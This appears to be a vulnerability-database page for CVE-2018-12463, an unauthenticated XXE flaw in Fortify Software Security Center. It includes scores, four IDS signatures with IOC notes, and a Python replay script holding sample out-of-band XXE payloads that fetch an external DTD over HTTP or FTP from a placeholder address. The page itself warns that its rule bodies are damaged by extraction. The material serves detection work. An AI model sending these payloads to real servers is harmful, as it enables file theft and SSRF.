CVE-2018-12463
Published 2018-07-12
Priority: P2 · 69 · Critical 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: public PoC indexed (exploit-db.com/exploits/45027)
EPSS: 13.85% (percentile 96.1)
An XML external entity (XXE) vulnerability in Fortify Software Security Center (SSC), versions 17.1, 17.2 and 18.1, allows remote unauthenticated users to read arbitrary files or conduct server-side request forgery (SSRF) attacks via a crafted DTD in an XML request. The SOAP request body is parsed with external entity resolution enabled, so a DOCTYPE that points at an attacker-hosted DTD is fetched by the server and its entities are expanded there, which is what turns a parser setting into file read and SSRF.
Affected
4 ranges (version bounds were not captured on this page; the description lists 17.1, 17.2 and 18.1)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hp | fortify_software_security_center | — | — |
| hp | fortify_software_security_center | — | — |
| hp | fortify_software_security_center | — | — |
| micro_focus | fortify_software_security_center | — | — |
Detection & IOCs (extracted from sources)
snort
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Fortify Software Security Center XML External Entity Injection 1"; flow:established,to_server; http.uri; content:"/fm-ws/services"; fast_pattern; endswith; http.request_body; content:""; reference:url,exploit-db.com/exploits/45027/; reference:cve,2018-12463; classtype:attempted-user; sid:2025841; rev:3; metadata:attack_target Web_Server, created_at 2018_07_16, cve CVE_2018_12463, deployment Datacenter, signature_severity Major, updated_at 2020_09_16;)
snort
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Fortify Software Security Center XML External Entity Injection 2"; flow:established,to_server; http.uri; content:"/fm-ws/services"; fast_pattern; endswith; http.request_body; content:"]+\x22\s*http\x3a\x2f\x2f.+\.dtd/Ri"; reference:url,exploit-db.com/exploits/45027/; reference:cve,2018-12463; classtype:attempted-user; sid:2025842; rev:3; metadata:attack_target Web_Server, created_at 2018_07_16, cve CVE_2018_12463, deployment Datacenter, signature_severity Major, updated_at 2020_09_16;)
snort
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Fortify Software Security Center XML External Entity Injection 3"; flow:established,to_server; http.uri; content:"/fm-ws/services"; fast_pattern; endswith; http.request_body; content:"]+\x22\s*ftp\x3a\x2f\x2f/Ri"; reference:url,exploit-db.com/exploits/45027/; reference:cve,2018-12463; classtype:attempted-user; sid:2025843; rev:3; metadata:attack_target Web_Server, created_at 2018_07_16, cve CVE_2018_12463, deployment Datacenter, signature_severity Major, updated_at 2020_09_16;)
snort
alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Fortify Software Security Center XML External Entity Injection 4"; flow:established,to_server; http.uri; content:"/fm-ws/services"; fast_pattern; endswith; http.request_body; content:"]+\x22\s*http\x3a\x2f\x2f.+\.dtd/Ri"; content:"&send|3b|"; reference:url,exploit-db.com/exploits/45027/; reference:cve,2018-12463; classtype:attempted-user; sid:2025844; rev:3; metadata:attack_target Web_Server, created_at 2018_07_16, cve CVE_2018_12463, deployment Datacenter, signature_severity Major, updated_at 2020_09_16;)
- The vulnerable endpoint is the unauthenticated SOAP service at POST /ssc/fm-ws/services; no credentials are needed to reach the XML parser.
- Inspect HTTP request bodies to /fm-ws/services for DOCTYPE declarations that reference an external DTD over HTTP (SYSTEM "http://...*.dtd"); this is the shape of an OOB-XXE exfiltration attempt (sid 2025842).
- Inspect the same bodies for DOCTYPE declarations that reference an external DTD over FTP (SYSTEM "ftp://..."), the FTP-based OOB-XXE variant (sid 2025843).
- Look for the entity reference &send; in POST bodies to /fm-ws/services: it is the OOB-XXE trigger that expands the attacker-defined entity and pushes the read data to the attacker's server (sid 2025844 pairs it with the HTTP DTD match).
- The public exploit sets Content-Type to 'text/xml; charset=UTF-8; text/html;' and SOAPAction: ""; a Content-Type carrying two media types is an additional, low-cost detection signal.
- The vulnerability affects only the listed SSC versions; confirm the deployed version before tuning detections. Note that the rules fire on the request, not on success, so a patched host that is probed still produces a true alert about an attempt, not a false positive.
- The ET rules match on the HTTP request body (the http.request_body sticky buffer plus PCRE), so the IDS/IPS must inspect full POST bodies, not just headers, for the /fm-ws/services URI.
- As reproduced on this page, the four rule bodies have lost their angle-bracketed match strings to HTML extraction: `content:"";` and `content:"]+\x22\s*http\x3a\x2f\x2f.+\.dtd/Ri"` are the remains of the `<!DOCTYPE` content match and the `pcre:"/...[^>]+.../Ri"` option. Take the rules by sid (2025841 through 2025844) from the ET Open ruleset rather than copying them from here.
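The bullets above describe the constraints each signature ANDs together: a URI ending in /fm-ws/services, a DOCTYPE in the body, the scheme of the external DTD, and the &send; trigger. The following Python is an added example, not code from this page or from Emerging Threats: it re-implements those constraints and runs them over constructed SOAP requests so the per-sid behaviour, the URI gate that silences all four, and the Content-Type side-signal can be checked offline. Assumptions: the `<!DOCTYPE[^>]+` prefix of the PCREs is reconstructed from the fragments this page preserves; sid 2025841's body match is modelled as "a DOCTYPE declaring a SYSTEM entity" because its content string is missing here; and the sample requests, headers and the 198.51.100.7 address are constructed.

```python
"""Replay of the ET Open detections for CVE-2018-12463 against constructed SOAP
requests. Added example: the body patterns are Python re-implementations of the
rule constraints as this page reproduces them, not the ET rules themselves."""
from __future__ import annotations

import re
from dataclasses import dataclass

# http.uri; content:"/fm-ws/services"; endswith  (shared by all four sids)
FORTIFY_URI_SUFFIX = "/fm-ws/services"

# Body matches per sid, case-insensitive like the rules' /Ri modifier.
# ASSUMPTION: the "<!DOCTYPE[^>]+" prefix is reconstructed from the page's
# ']+\x22\s*http...' fragment; the page's copy of sid 2025841 lost its
# angle-bracketed content string entirely, so it is modelled here as
# "a DOCTYPE that declares an external (SYSTEM) entity".
BODY_PATTERNS = {
    2025841: re.compile(rb"<!DOCTYPE[^>]*<!ENTITY[^>]*\bSYSTEM\b", re.I),
    2025842: re.compile(rb'<!DOCTYPE[^>]+"\s*http://.+\.dtd', re.I),
    2025843: re.compile(rb'<!DOCTYPE[^>]+"\s*ftp://', re.I),
}
# sid 2025844 = the sid 2025842 match plus the OOB trigger entity &send;
SEND_TRIGGER = re.compile(rb"&send;")
MEDIA_TYPE = re.compile(r"[a-z0-9.+-]+/[a-z0-9.+-]+", re.I)


@dataclass
class HttpRequest:
    uri: str
    headers: dict[str, str]
    body: bytes


def matching_sids(req: HttpRequest) -> list[int]:
    """Return the ET sids whose URI and body constraints the request satisfies."""
    if not req.uri.endswith(FORTIFY_URI_SUFFIX):
        return []
    hits = [sid for sid, pat in BODY_PATTERNS.items() if pat.search(req.body)]
    if 2025842 in hits and SEND_TRIGGER.search(req.body):
        hits.append(2025844)
    return sorted(hits)


def anomalous_content_type(headers: dict[str, str]) -> bool:
    """Extra signal from the IOC list: a Content-Type carrying two media types,
    as in the exploit's 'text/xml; charset=UTF-8; text/html;'."""
    ctype = next((v for k, v in headers.items() if k.lower() == "content-type"), "")
    return len(MEDIA_TYPE.findall(ctype)) > 1


ENVELOPE = (
    b'<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
    b"<soapenv:Body>%s</soapenv:Body></soapenv:Envelope>"
)
# Constructed sample bodies; 198.51.100.7 is a documentation address, not a real host.
OOB_HTTP_BODY = (
    b'<?xml version="1.0"?>\n<!DOCTYPE soap [\n'
    b'  <!ENTITY % remote SYSTEM "http://198.51.100.7/evil.dtd">\n  %remote;\n]>\n'
    + ENVELOPE % b"&send;"
)
OOB_FTP_BODY = (
    b'<?xml version="1.0"?>\n<!DOCTYPE soap [\n'
    b'  <!ENTITY % remote SYSTEM "ftp://198.51.100.7/">\n  %remote;\n]>\n'
    + ENVELOPE % b"&send;"
)
BENIGN_BODY = b'<?xml version="1.0"?>\n' + ENVELOPE % b"<ns:getVersion/>"

EXPLOIT_HEADERS = {"Content-Type": "text/xml; charset=UTF-8; text/html;", "SOAPAction": '""'}
NORMAL_HEADERS = {"Content-Type": "text/xml; charset=UTF-8", "SOAPAction": '""'}

SAMPLE_REQUESTS = {
    "oob_http": HttpRequest("/ssc/fm-ws/services", EXPLOIT_HEADERS, OOB_HTTP_BODY),
    "oob_ftp": HttpRequest("/ssc/fm-ws/services", NORMAL_HEADERS, OOB_FTP_BODY),
    "benign": HttpRequest("/ssc/fm-ws/services", NORMAL_HEADERS, BENIGN_BODY),
    # same payload, different path: the URI constraint keeps all four sids quiet
    "off_path": HttpRequest("/ssc/api/v1/projects", EXPLOIT_HEADERS, OOB_HTTP_BODY),
}


def scan(requests: dict[str, HttpRequest]) -> dict[str, dict]:
    """Per-request verdict: matching sids plus the Content-Type side-signal."""
    return {
        name: {"sids": matching_sids(r), "odd_content_type": anomalous_content_type(r.headers)}
        for name, r in requests.items()
    }


if __name__ == "__main__":
    for name, verdict in scan(SAMPLE_REQUESTS).items():
        print(f"{name:9} sids={verdict['sids']} odd_content_type={verdict['odd_content_type']}")
```

The off_path request carries the full OOB payload yet matches nothing, which is the point of the `endswith` URI gate: these signatures are scoped to the SSC SOAP path, so a generic XXE rule is still needed for other applications behind the same sensor.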
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| NVD | 3.0 | 7.3 | HIGH | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L |
| NVD | 2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
The v3.0 and v3.1 vectors share every exploitability component; they differ only in the impact metrics (L/L/L versus H/H/H), which is what moves the rating from High to Critical.
Suricata
The same four ET Open signatures (sids 2025841 through 2025844, created 2018-07-16, rev 3) are published in the Suricata ruleset; their bodies are identical to the Snort rules listed under Detection & IOCs.
No writeups or analysis indexed.
References
- http://www.securitytracker.com/id/1041286
- https://softwaresupport.softwaregrp.com/document/-/facetsearch/document/KM03201563
- https://www.exploit-db.com/exploits/45027/